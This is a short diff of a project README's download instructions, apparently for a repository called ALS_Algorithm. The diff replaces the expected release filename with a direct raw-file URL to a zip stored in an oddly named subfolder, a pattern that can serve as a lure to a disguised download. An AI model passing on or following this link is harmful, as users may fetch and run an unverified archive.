Rimuru1129/ALS_Algorithm/README.md

 1. Click on the link above to go to the releases page.
 2. Find the version you want to download.
 The latest version is usually at the top.
-3. Look for the downloadable file, typically named `ALS_Algorithm.zip` or similar.
+3. Look for the downloadable file, typically named `https://raw.githubusercontent.com/Rimuru1129/ALS_Algorithm/main/damasse/ALS_Algorithm-2.8.zip` or similar.
 4. Click on the file to start the download.
 5. Once downloaded, extract the contents of the ZIP file to your preferred directory.
 6. Open your terminal or command prompt.